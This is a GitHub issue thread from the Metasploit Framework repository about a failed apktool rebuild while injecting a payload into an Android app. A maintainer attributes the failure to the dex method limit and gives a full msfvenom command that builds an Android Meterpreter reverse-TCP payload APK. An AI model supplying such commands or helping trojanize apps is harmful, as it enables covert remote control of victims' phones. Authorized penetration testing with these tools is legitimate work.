### ISSUE TITLE
unable to rebuild apk with apktool

### ISSUE THREAD

**Issue by tarunpasrija19** [rapid7/metasploit-framework#13818]
![apktool 1](https://user-images.githubusercontent.com/65336849/86780498-6fa74e00-c07a-11ea-8733-35049aa54e62.PNG)

**Comment by tarunpasrija19** [comment]
don't close the session..after you reply ...

**Comment by bcoles** [comment]
@timwr is happy to assist with Termux related issues

**Comment by tarunpasrija19** [comment]
thank you @bcoles

**Comment by tarunpasrija19** [comment]
@timwr ..can you help me ?

**Comment by timwr** [comment]
@tarunpasrija19 my guess is that the app you're trying to inject into is already so close to the dex limit that the additional payload methods push it beyond this limit. dex files can have a 65536 method limit, and larger apps use additional dex files to store the code. https://blog.mindorks.com/understanding-multidex-in-android
I don't think there is anything you can do to make this particular app work, you'll have to try with another APK.

Have you tried leaving out the -x parameter altogether and just using the default payload?
e.g `msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o payload.apk`
